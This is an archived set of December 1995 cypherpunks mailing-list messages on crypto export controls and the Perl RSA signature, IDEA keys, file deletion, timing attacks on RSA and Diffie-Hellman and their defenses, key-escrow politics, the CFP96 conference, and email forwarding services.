Zoe Lofgren          ZOEGRAM@hr.house.gov
Howard McKeon        TELLBUCK@hr.house.gov
George Miller        GMILLER@hr.house.gov
Ron Packard          RPACKARD@hr.house.gov
Nancy Pelosi         SFNANCY@hr.house.gov
George Radanovich    GEORGE@hr.house.gov
Andrea Seastrand     ANDREA22@hr.house.gov
Pete Stark           PETEMAIL@hr.house.gov
Walter R. Tucker     TUCKER96@hr.house.gov
Lynn C. Woolsey      WOOLSEY@hr.house.gov

If anyone wants a list of all reps and senators, you can get them at
http://www.house.gov/ and ftp://ftp.senate.gov respectively.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM4i7LZc+sv5siulAQGqAQP7B0GxtK39t+GKSY9vmxgdMfEh3pFGsjnd
NzXtuZbHuHUDHtQjHY3mcLWBQupjrwy9lRMfjMzeP3sDgjuf2sLMEko94hzSUlo9
yBAvprqkRDt71cp58uZm2fSimFFxa7G4EFAx1HF/AD6iy0zD9WNF7uwkO58IRtzB
l6mQKvwnFFU=
=kFtx
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 13 Dec 1995 05:08:45 +0800
To: cypherpunks@toad.com
Subject: chaotic signal cryptography
Message-ID: <199512121900.UAA00315@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995 12:00:38 -0500 (EST), L. Den-Hollander wrote (in part):
>A few years back i ran thru a paper emanating
>from a navy labs researcher (i think the name was Peccora)
>about using synchronised chaotic signal generators as a
>signal scrambling/encrytpion scheme.

I too am interested in this technique.  I may be wrong, but it seems like
a variation on the one-time pad.  Any comments on this technique (usefulness,
robustness, etc.)?

	Hooker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 13 Dec 1995 10:33:50 +0800
To: cypherpunks@toad.com
Subject: BIO-MUNITION: gifs of perl-RSA tattoo
Message-ID: <730.9512122013@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



People have been reading the list for a while will be familiar with
this piece of perl code used as a non-exportable, supposedly ITAR
controlled .sig:


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


which is an implementation of RSA encryption in perl optimised for
size.

A lot of list bandwidth a while back was consumed with discussion of
the T-shirt versions of this .sig.  More info on the .sig, and T-shirt at:

.sig:		http://www.dcs.ex.ac.uk/~aba/rsa/
t-shirts:	http://www.obscura.com/~shirt/

Update wrt the idea of using the .sig for a tattoo:

Richard White <maldoror@pacificnet.net> had his wife (who is a tattoo
artist) put a tatto of this code on his forearm.

Gif of the Richard's tattoo now available here:

	http://www.dcs.ex.ac.uk/~aba/rsa/tattoo.html

This means that he may, technically, qualify as a munitions on the
USML, and as a result not be allowed to show the tattoo to a foreign
national in the US, nor leave the US.

Note it says _technically_ above, as there was much discussion on the
list re the shirts as to whether the shirt actually would ever be
classified as a munition due to the impracticality of using a shirt as
a distribution media, and silliness factor.  We shall see wrt the
shirt when and if Raph recieves a determination from his CJR for the
shirt.  (I would note that someone posted a while ago that they did
manage to get the barcode to scan, on I think one of Joel Furr's
shirts).  Also the secondary claim about whether or not ITAR
stipulates that a software item can be shown to a foreign national in
the US seems open to debate (some say ITAR strictly interpreted does
say this, others say not).

Also something about the anti-ITAR fight recently which was an eye
opener for me was that I took a look at Phil Karn's export page to do
with his ongoing battle against ITAR as applied to crypto, with the
Applied Crypto disk/book case:

	http://www.qualcomm.com/people/pkarn/export/

In his court transcripts there is a declaration by Phil Zimmermann in
connection with the Applied Crypto case, however he (PRZ) also
mentions the unofficial progress on his PGP source code book published
by MIT press.

PRZs declaration from bottom of:

	http://www.qualcomm.com/people/pkarn/export/zimm.html

> 10. I believe that the commodity jurisdiction request referred on page
> 28 of the Justice filing is the one which was filed by MIT Press for
> my book, PGP: Source Code and Internals. I am further informally
> advised that the National Security Agency has considered the Request
> and recommended that the book be controlled for export under the ITAR
> and that the Department of Commerce has recommended that it not be
> subject to ITAR controls.

Wow!  If this informal info is confirmed as the NSAs determination, it
will have interesting ramifications for the distinction between paper
based publications and electronic.  It will also reinforce Phil Karn's
use of the charge of "arbitrary, [and] capricious" enforcement on the
part of the NSA/ODTC, as the CJR for Applied Crypto in print form was
successful.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 13 Dec 1995 11:39:56 +0800
To: cypherpunks@toad.com
Subject: Re: Pornographic stories
In-Reply-To: <9512122251.AA03113@envirolink.org>
Message-ID: <ND11FD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel Miskell <DMiskell@envirolink.org> writes:
> A&SUser writes:
> >Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago.
> > I'm not sure how you do your Pornographic server, so I'll just ask
> >again.  I know I would be VERY gratful if you could send me any XXX
> >stories, I love to read them.  I could reward you over the net somehow
> >I'm sure.
> >my adress is mphillips@cctr.umkc.edu
> >
> >Thanks....I'll be waiting.
> >
> What the hell are you talking about??  This is the cypherpunks mailing list!!
> Jeses, try alt.sex.stories. :P

If you can read Russian, you can read pornography on soc.culture.russian. :)

I too fail to see the cryptorelevance of this thread... Unless alt.sex.stories
is used for steganography... Alice wants to send a secret message to Bob, so
she posts a porn story to alt.sex.stories, where the key phrase is "That was
the best sex I've ever had", which sounds like a mild hyperbole to most people;
only Bob knows that it really means "the bomb is scheduled to detonate at
midnight." But what's it got to do with writing code??? :) :)

(Does Molly=Lance?)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 11:15:48 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
In-Reply-To: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
Message-ID: <Pine.LNX.3.91.951212212447.94B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995, Ben Holiday wrote:

> 
> The copy of the source for idea (unix) that I have specify's a user key 
> length of 8 bytes, but allows this to be increased to something larger. 
> Will increasing the user keylength improve the overall security? 
> 
IDEA uses 128-bit keys.  The program must do some XORing with the user key
to expand it to 16 bytes.  Therefore, I would guess that it would be more
secure to use a longer key.

> Also, is it worth hashing the user key first, then using the hashed key 
> as the key for encryption and decryption? Or am I wasting my time? 
> 
It probably isn't going to help with security at all if you plan to use a
hexadecimal representation of the hash as is the common output of hashing
programs.  The best key would be one that uses random letters, numbers, and
symbols.

> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
> really really gone? 
> 

Not very secure.  I have heard that there is a Linux undelete and there might
be a similar program for other Unices.  If the hard drive is examined using
special hardware, data will be recoverable.  The data should be overwritten
at least five times, maybe more depending on the level of security you want,
before being deleted.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM46pLZc+sv5siulAQFZgwQAh/TFur/p9yMlTD9qM0/sT6olo6aKGjGb
OGas4p939mqfPdCu4LFyD6Tcg79YA90a108IEcE+rQB4o40/zDSkvoEUOz7a6nlb
vqxI6Lv8Qdv40mVmH9Bxd9OhX+Vgsb7pkTHj9ViHlw9X2xjnwOSiKAu7nRupG1Tj
A3IrqyCGapA=
=us1o
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Thu, 14 Dec 1995 06:22:46 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: IDEA encryption
In-Reply-To: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
Message-ID: <199512130237.VAA21019@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> The copy of the source for idea (unix) that I have specify's a user key 
> length of 8 bytes, but allows this to be increased to something larger. 
> Will increasing the user keylength improve the overall security? 

Umm, I think you are confused.  First, IDEA has a keysize of 16 bytes,
not 8.  Second, it cannot be easily changed.  Sure, your code probably
has a #define for the keysize, but that is just to describe the magic
number, not to make it easy to change it. Increasing the keylength of
IDEA, without changing anything else, will probably _NOT_ make it more
secure.

> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
> really really gone? 

Well, it depends on what you mean by "really really gone".  All RM
does is remove the link from the directory entry to the file inode on
disk.  If the inode refcount reahes zero, then the disk blocks are
marked as free.  However the data in those blocks remain on disk until
another file writes over them.

It is theoretically possible to write a program to "unrm" a file.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tod McQuillin <devin@lm.com>
Date: Wed, 13 Dec 1995 15:00:54 +0800
To: cypherpunks@toad.com
Subject: PGP/PINE integration
Message-ID: <Pine.VUL.3.91.951212215232.25435I-100000@throop.foxholly.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've modified PINE 3.91 to support PGP encryption from within its message 
editor.  I did the same thing for pine 3.89 a year and a half ago; I
finally got around to updating my changes for 3.91.

It's relatively seamless but provides no convenient means of decryption
from within PINE. 

diffs available from:

	ftp://ftp.foxholly.com/pub/pine-pgp-patch
- -- 
Tod McQuillin

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM5Rs3hYKXs9uIwxAQHDlAP/Rku0lbeaVPfTwZsfFxjbov0KZ5PAcLkJ
emrE9vpr0pMSESuy0jIp7VRMHSUGA0Q0y7VFhinDxbsLT4FdVsCk5uxwieerzT/g
pnI7N8yNzVgM1IDXGL9lzGMyidULRoSnfSePT9AAjJxaIHOOK8+rw2bT4Cv1vDPw
JZFOFxhqW/U=
=osQC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 13:49:58 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Time-based cryptanalysis: How to defeat it?
In-Reply-To: <199512130144.RAA08950@jobe.shell.portal.com>
Message-ID: <9512130320.AA22567@all.net>
MIME-Version: 1.0
Content-Type: text


> From: futplex@pseudonym.com (Futplex)
> > I don't understand why Kocher's point is correct. For example, why do the
> > times diverge with the following modification of the modexp algorithm on
> > pg.2 of the abstract ?
> > 
> > 	Algorithm to compute R = y^x mod n:
> > 		Let R_0 = 1.
> > 		Let y_0 = y.
> > 		For i = 0 upto (bits_in_x - 1):
> > 			Let M = (R_i * y_i) mod n.
> > 			Let R_(i+1) = (bit i of x) * M  +
> > 					(1 - (bit i of x)) * R_i.
> > 			Let y_(i+1) = (y_i)^2 mod n.
> > 		End.
> 
> I posted a similar idea on sci.crypt, but later I realized that Paul Kocher
> is right.
> 
> Your algorithm works OK for the first iteration.  The amount of work is
> pretty much constant regardless of whether bit 0 of x is 0 or 1.
> However, at the end of that iteration R_1 will have one of two
> different values depending on that bit 0 value.  And, the attacker can
> know these two values, and if he controls y he can even choose them
> (they will be either y or 1).

I think that a lot of chosen plaintext attacks work regardless of timing
analysis.  For example, there is a well known chosen plaintext attack
against the RSA.  The deeper issue is that all of the efficient
algorithms for modular exponentiation take more time for 1s than for 0s. 
So the way to get security is to sacrifice efficiency (a widely known
but rarely proven reality).

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Dec 1995 14:25:09 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.BSF.3.91.951212132638.29192C-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951212230359.16170C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Brian Davis wrote:

> On Tue, 12 Dec 1995, David E. Smith wrote:
> 
> > At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:
> > 
> > >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> > >> | out his wallet and handed him 10 crisp $100 bills.  :-)
> > >> Great.  mention it where the IRS is sure to be listening.  :)
> > >Why would the IRS listen?  Everyone knows the tax system is voluntary.
> > 
> > Do you know something I don't?  :)
> > Would you mind sharing?  :)

Apparently so.  It's called 'sarcasm'

> 
> Try misc.taxes for the tax protestor arguments (which fail of course).  
> But by asking, you may be on "their" list (and I don't mean a list held 
> by tax protestors but by a TLA).  And if you're reallllllly bad about it, 
> one of my buddies may decide to invite you in ...
> 
> EBD
> 
> 
> > 
> > Dave
> > ----- David E. Smith, c/o Southeast Missouri State University
> > 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Dec 1995 14:46:47 +0800
To: Ginger Warbis <Webmaster@fornits.com>
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512121939.OAA17633@www2.clever.net>
Message-ID: <Pine.SUN.3.91.951212230450.16170D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Ginger Warbis wrote:

> >On Fri, 8 Dec 1995, James A. Donald wrote:
> >
> >> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
> >> >Credit where credit is due.
> >> >
> >> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
> >> 
> >> Well I for one, am serious unsatisfied, but it is not so bad as
> >> to merit a campaign against Netscape.
> >
> >I think it's a good start.  I would like to see how much effort after 
> >this really pans out.  Doesn't take much to put out a policy statement.  
> >Takes a lot to follow it through.
> >
> 
> Greetings all. May I also point out that the power of self government is at
> least as effective when rewarding good behavior as when punishing bad. You
> guys are the experts in this particular political niche, but from the
> viewpoint of a more or less innocent stander-by, the statement sounded to me
> like "OK, we went, we listened, they were full of shit, the line is HERE."
> and I'm quite satisfied.

I haven't seen 'good behavior' worth much notice yet.  Like I said, it 
takes about 10 minutes to come up with a written policy.  Netscape may 
have done more than that, but who's to say?

I'll be impressed when I see a sustained record of activism on the issue.
Till then they are slimy corporate types.  Which, IMHO, is fine so long 
as they don't claim to be anything else.

> --
> Bill & or Ginger Warbis
> WebMaster@Fornits.com - http://fornits.com/
> "The more corrupt the state, the more numerous the laws."
> Tacitus, Roman senator and historian (A.D. c.56- c.115)
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 13 Dec 1995 16:48:45 +0800
To: nsb+limbo@nsb.fv.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
Message-ID: <199512130722.XAA11947@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 12/11/95 -0700, Bryce wrote:
> To get to the point, I want to know if this "fundamental 
> tradeoff" that you refer to is in fact *fundamental*.  That is
> to say: is the product of the "security factor" and the
> "usability factor" a constant?  Or are there methods which can
> be practically implemented to make strong cryptography easier
> for Joe Average to use without exposing Joe to unnecessary
> risks?

Web of trust is a mess because it attempts to link keys to 
physical people, which in general cannot be done.

If we stick to a lesser goal -- constancy of identity -- 
this is not so hard.  In general it is impossible to prove that 
Bryce is the "real" Bryce, but it is trivial to prove that 
Bryce is the same Bryce who has a certain Web page, and the
same Bryce who posted a certain article in archives.

We should blow off this attempt to do the impossible.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 13 Dec 1995 16:42:23 +0800
To: Black Unicorn <Webmaster@fornits.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <199512130723.XAA11951@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 12/12/95 -0500, Black Unicorn wrote:
> I haven't seen 'good behavior' worth much notice yet.  Like I said, it 
> takes about 10 minutes to come up with a written policy.  Netscape may 
> have done more than that, but who's to say?
>
> I'll be impressed when I see a sustained record of activism on the issue.
> Till then they are slimy corporate types.  Which, IMHO, is fine so long 
> as they don't claim to be anything else.

While I am unhappy about many aspects of their statement, notably 
that they use the governments phrase "key escrow" all over the place, 
the fact is they have placed news about what mischief the government 
is up to, on a location that get a totally stupendous number of hits.

This will notify a stupendous number of people what the government 
is up to.

It is less than they could have done, less than they should have done,
but it is still a very big something, and having done this, before
the entire internet and all their customers, it is at least somewhat
difficult for them to then turn around and shop their customers 
to the state.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Wed, 13 Dec 1995 14:10:10 +0800
To: cypherpunks@toad.com
Subject: Computers, Freedom, and Privacy Conference -- Registration Open
Message-ID: <9512130408.AA22004@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




		      Please redistribute widely

	       ****************************************

The Sixth Conference on Computers, Freedom, and Privacy will take
place at the Massachusetts Institute of Technology on March 27-30,
1996.  CFP96 is hosted by MIT and by the World Wide Web Consortium.

You can register for CFP96 by US Mail, by fax, or via the World Wide
Web.

Conference attendance will be limited.  Due to the enormous public
interest in CFP issues over the past year, we encourage you to
register early.

SPECIAL NOTE TO STUDENTS: There are a limited number of places
available at a special student rate.  These will be allotted on a
first-come first-served basis, so register as soon as possible.

For more information, see the CFP96 Web page at

		       http://web.mit.edu/cfp96

or send a blank email message to 

			  cfp96-info@mit.edu

Since its inception in 1991, the series of CFP conferences has brought
together experts and advocates from the fields of computer science,
law, business, public policy, law enforcement, government, and many
other areas to explore how computer and telecommunications
technologies are affecting freedom and privacy.

Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a mock Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption.
      
    - Authors Pat Cadigan, Tom Maddox, Bruce Sterling,
      and Vernor Vinge divine the future of privacy.

    - College administrators, students, lawyers, and journalists
      role-play scenarios that plumb the limits of on-line expression
      on campus networks.

    - Panels on international issues in privacy and encryption; on the
      struggle to control controversial content on the Internet; on
      tensions between copyright of digital information and freedom of
      expression; on threats posed by electronic money to law
      enforcement, privacy, and freedom; on mass communication versus
      mass media.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Wed, 13 Dec 1995 14:13:22 +0800
To: cypherpunks@toad.com
Subject: NT Password Security Update.  Registry values changed!
Message-ID: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I did some more research into the NT password security issue and I
discovered that I can get access to the Security section of the registry and
there are some VERY interesting values there, stored as raw hex.  I created
a test user and checked the values of these registry keys with two different
passwords and iterestingly enough the data in the keys changed when I
changed the password.  I plan on doing some more work, including changing
the values and seeing if the password change, but I've been somewhat busy
lately.  I've st up a web page at 

http://shadowland.rh.uchicago.edu/ntcrypto.html 

that has the password I used and the data in the two registry values that
changed when I changed the password.  I invite people to look at it and
speculate what the change means.  Also, I can provide a few more
plaintext/cyphertext pairs if necessary.  The change in the values could be
something like update time, but I don't think that they'd store that as raw
hex, espically hex as long as the stuff I got.  Good luck figuring it out.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 14 Dec 1995 02:26:33 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121306.IAA02006@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951212231006.5039C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Perry E. Metzger wrote:
> 
> Go ahead and trust that no one can do it, then. Considering that NTP
> can synch up clocks over the net with astonishing accuracy with
> multiple probes, it would be hard to believe that you couldn't

Perry - I don't think NTP goes down to the sort of resolution that 
appeared to be where the signal is here, and for quantisation reasons, I 
don't think it can work over a public routed internetwork. I'm still open 
to having my mind changed here; my network weenie gut instincts tell me 
that routing is too non-random for the signal to propogate. 

[I may have misread the paper, but the accuracy required seemed to be on 
the order of 10-100 usecs; if I've got that wrong, could someone mail me 
an OOM to be working with]

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 00:21:58 +0800
To: lyalc@mail.mpx.com.au (lyal collins)
Subject: Re: Timing RSA and Certificates worth ??
Message-ID: <199512130721.XAA21701@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM 12/13/95 +1100, lyalc@mail.mpx.com.au (lyal collins) wrote:
>I meant that on-line certificate issuing, notary and similar services where
>data is submitted to a system for processing/RSA encryption are subject to
>this for of attack.
>Parts of the SEPP/STT protocols appear to require this of merchants and
>customers.
>I retract my comments about ecash/echeques - I'm not sure of the
>implications there yet.
>As for SEPP/STT - another nail in the coffin, me thinks.

For large environments like this, it's possible to work around the attack
by methods like queueing up all the signature jobs and doing them
serially; this makes it difficult for the Bad Guy to know whether the server 
is taking time doing his multiplications or Alice's or N other customers',
so he can't control timing very well by picking otherwise-informative numbers.

On the other hand, your smartcard or PC is still at risk, since it's _not_
doing a lot of them, unless it's doing them just sort of at random when
it's got nothing better to do and throws the real work in the middle.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 07:50:56 +0800
To: cypherpunks@toad.com
Subject: Potential defense against timing attack on Diffie-Hellman
Message-ID: <199512130721.XAA21709@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The timing attack on Diffie-Hellman depends on assumptions
about what multiplications are being made, and in what order.
But you don't need to do them in order.

The standard approach to calculating Y**x mod m is to calculate
        Y[1] = Y, Y[2] = Y**2, Y[3] = Y**4, .... Y[logx] = Y**(logx), 
and while you're doing this keep a running total r[i], where 
        r[i] = (bit[x,i]) ? (r[i-1]*Y[i]) : r[i-1]
all arithmetic modulo m (and all indices possibly off by one :-)

This may be a bit memory-intensive for a smartcard, but there's
no need to calculate these partial products in order; precompute
the Y[i], pick a random permutation of 1..(logx), and compute
the partial products in that order.  This still leaks the number
of 0 and 1 bits in x, but it doesn't say what they are.
You probably still should multiply r[i-1]*Y[i] whether you're 
going to need it or not; I don't think the method hides enough
information otherwise, but that needs more analysis.

Cost - mostly administrative, plus the memory, since keeping track
of permutations of small integers is cheap relative to bignum 
multiplication and modulo calculations.  You also need a random 
number generator of some sort; LFSRs seem to be an easy way to 
do permutations on the fly, so seed them with something decent.

How effective is it?  I'm not sure - I'd need to do a lot more analysis
than I've done so far, and the long version of Paul's paper would
help :-)  But at first glance it looks like it makes it much harder;
no two calculations are in the same order, so feeding the system
related Y = g**y mod m each time doesn't tell you much.

As a further annoyance to the listener, split the permutation
at random into two or three pieces, compute their products separately,
and then multiply those partial products together.  (Don't try this at
home without analyzing whether it may leak more information than it
conceals...)  At very minimum, take two numbers you've got lying
around and multiply them every once in a while :-)

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 13 Dec 1995 16:47:02 +0800
To: cypherpunks@toad.com
Subject: e-mail forwarding, for-pay remailers
Message-ID: <199512130721.AA23573@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't have much faith that the people who are currently doing the DNS
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other
ways to get & send E-mail (e.g., more persistent than this address which
will disappear when I'm done with school in ~ 6 months). I've found a few
services which may be of interest to C-punks because they're useful for
creating/maintaining persistent cyberspace identities with no necessary
connection to a "real name".

I'm not listing the alpha-style alias servers because they depend on
underlying remailers which I think makes them likely to be slower & less
reliable; also, they won't store E-mail for you, such that you could connect
every day or two or [...] to pick it up.

I'm also ignoring the zillions of ISP's because I think that the market is
separating (or ought to) into service/storage providers and connectivity
providers. My hunch is that in the next year or so it's going to become easy
to get nationwide dialups for IP connectivity the way it was done for X.25
10 years ago, so you won't care *where* you are, you'll be able to get an IP
connection back to the folks that hold your mail, and you won't give a shit
where *they* are. Then again, if the Exon stuff passes, I suspect that all
we'll be left with in the US are service providers who deal with us at the
level of IP packets and get (quasi-)common carrier status, acting just like
Sprintnet/Tymnet/Telenet/CPN, but with IP not X.25. We'll all connect to
offshore providers to pick up our E-mail and read our newsgroups, the
control freaks will hate it, and we won't care.

netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
or forwarding for people; they let you sign up for a trial month for free.
They ask for name/address/phone (which could easily be a Mailboxes Etc
address and a voicemail from Mailboxes Etc or whatever) and accept payment
by check or credit card. They'll store incoming email or forward it to
another account. They'll do header rewriting (similar to the anonymous
remailers)
so that outgoing mail looks like it came from this address.

thebook.com ( http://www.thebook.com ) provides web pages and E-mail storage
or forwarding or E-mail -> FAX conversion, and also let you sign up for a
free month to try things out. They also ask for name/address/phone. You can
send incoming Emails to different places depending on wildcard-based filter
criteria.

The ACM ( http://www.acm.org ) provides e-mail forwarding and web pages to
ACM members ($25 for students or ~$80 for professionals) for ~ $25/year.

Hiway Technologies ( http://www.hway.com ) provides web pages and will
accept/forward mail sent to your own domain name for pretty cheap.

I'm planning to make a wee FAQ on this for my home page, please send along
comments re these folks or suggestions about others.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljanke@direct.ca
Date: Fri, 15 Dec 1995 00:19:12 +0800
To: cypherpunks@toad.com
Subject: Authenication and CIRC
Message-ID: <199512130722.XAA00259@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of versions of CIRC which support authenication?
The version I pulled off csua does not even for the initial 3DES
key exchange.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 13 Dec 1995 15:17:27 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: EXON [Noise]
In-Reply-To: <Pine.A32.3.91.951212150845.27478H-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <Pine.SUN.3.91.951212232721.5039F-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



Exon 		<clap, clap>
Exoff 		<clap, clap>
Exon, Exoff
The Censor 	<clap, clap> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
